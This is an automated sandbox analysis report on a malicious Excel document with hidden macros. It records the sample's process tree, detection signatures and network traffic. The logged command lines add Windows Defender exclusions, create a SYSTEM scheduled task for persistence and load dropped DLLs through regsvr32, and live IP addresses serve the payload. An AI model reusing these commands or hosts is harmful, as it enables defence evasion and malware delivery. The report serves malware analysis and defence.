Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Claim-1763045001-09242021.xls

Overview

General Information

Sample Name:Claim-1763045001-09242021.xls
Analysis ID:489852
MD5:7a4ee63e2e2aacea7ffa5d4f27261347
SHA1:c47ebf9357eaa3984e2a977a77469f2097004bda
SHA256:3776549225fea6c85372989034fb8d4d0d94eeca4ba33e8473d50898afea6533
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2664 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2060 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2136 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 984 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 1476 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2796 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1448 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1892 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3060 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 548 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • taskeng.exe (PID: 2424 cmdline: taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • regsvr32.exe (PID: 2344 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2276 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • reg.exe (PID: 908 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 2652 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
    • regsvr32.exe (PID: 1960 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1468 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Claim-1763045001-09242021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2664, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 2060
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2060, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2136

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 984, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, ProcessId: 1476

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000049.00000003.1179566339.0000000002731000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000037.00000002.1179167392.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000049.00000003.1180826805.0000000002731000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44463.6863100694[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 14:28:11 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6863100694.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 14:28:21 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6863100694.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 14:33:44 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6863100694.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000036.00000002.1180236690.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000037.00000002.1177193034.0000000000A10000.00000002.00020000.sdmp, regsvr32.exe, 0000004C.00000002.1185707196.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1181817022.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000052.00000002.1248992914.0000000000980000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
